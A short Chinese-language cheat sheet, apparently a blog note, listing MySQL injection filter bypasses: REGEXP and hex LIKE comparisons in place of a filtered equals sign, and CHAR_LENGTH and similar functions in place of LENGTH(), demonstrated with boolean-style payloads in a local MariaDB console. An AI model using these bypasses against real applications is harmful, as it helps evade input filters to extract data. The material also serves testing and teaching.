本文记录一些MySQL注入一些等价函数

过滤 = 等号

REGEXP =>

MariaDB [test]> select `req.host` from flow where id = 581 AND 1 REGEXP 1;
+---------------------------+
| req.host                  |
+---------------------------+
| init-p01st.push.apple.com |
+---------------------------+
1 row in set (0.00 sec)

MariaDB [test]> select `req.host` from flow where id = 581 AND 1 REGEXP 2;
Empty set (0.00 sec)

MariaDB [test]> select `req.host` from flow where id = 581 AND 0xef LIKE 0xef;
+---------------------------+
| req.host                  |
+---------------------------+
| init-p01st.push.apple.com |
+---------------------------+
1 row in set (0.00 sec)

MariaDB [test]> select `req.host` from flow where id = 581 AND 0xef LIKE 0xea;
Empty set (0.00 sec)

过滤 LENGTH()

CHAR_LENGTH => OCTET_LENGTH() => CHARACTER_LENGTH() =>

MariaDB [test]> select char_length('s');
+------------------+
| char_length('s') |
+------------------+
|                1 |
+------------------+
1 row in set (0.00 sec)

MariaDB [test]> select char_length('admin');
+----------------------+
| char_length('admin') |
+----------------------+
|                    5 |
+----------------------+
1 row in set (0.00 sec)